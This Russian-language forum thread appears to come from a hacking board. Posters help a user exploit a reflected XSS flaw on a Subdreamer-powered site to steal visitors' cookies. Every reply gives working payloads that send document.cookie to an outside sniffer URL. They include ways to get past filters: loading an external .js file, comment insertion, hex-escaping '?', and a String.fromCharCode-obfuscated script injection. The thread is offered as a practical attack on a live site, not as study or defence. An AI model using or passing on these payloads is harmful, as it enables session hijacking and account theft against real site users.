Вопрос по Xss

Нашел на сайте XSS, однако при подстановке
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
как будто бы обрезается все, что находится после ? и получается следующее:

<link>http://www......ru/<script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg</link>

Как решить эту проблему? Сайт стоит на Subdreamer.

 

Скачай Subdreamer и посмотри как там идет фильтрация даных и поймешь почему отрезается, а потом уже думай как это обойти

P.S В последних версиях CMS стоит фильтрация +document.cookie
P.S.S Сделай сылку на .js фаил и туда запихни

PHP:

img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

 

не надо не чего скачивать все проги имеют свой алгоритм..лишь твоя голова имеет конструктор алгоритмов.
Ты не написал это активная или пассивная XSS

1) Если активная блин то скорее всего есть проверка на конец строки чтобы было расширение тогда попробуй
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> /1.jpg
и вообще это тупо...юзай готовые тэги и их динамические параметры или высший пилотаж в активных XSS енто вложенные тэги.

Если ты указал пассивную XSS тогда скорее всего идёт проверка на длину строки переменной.
больше симолов н е чем отведенно под неё не вставишь.
Поэтому лучший тут выход будет юзать скрипт с другого ресурса.
к примеру вставить:
<script src=http://qwe.ru/1.js></script>

а на сайте http://qwe.ru/ в 1.js вставить скрипт передачи кукисов:

img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

 

только:

PHP:

img = new/**/ Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

 

Пробывал и таким макаром, опять же простое alert(document.cookie) в файле http://qwe.ru/1.js работает, а выражения типа

никчему не приводят.
XSS пассивная.

 

Если фильтруется символ ? зашифруй его в HEX
img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg\x3F"+document.cookie;

 

1.js
кидай псевдо-дефейс на снифф

document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,32,60,47,115,99,114,105,112,116,62))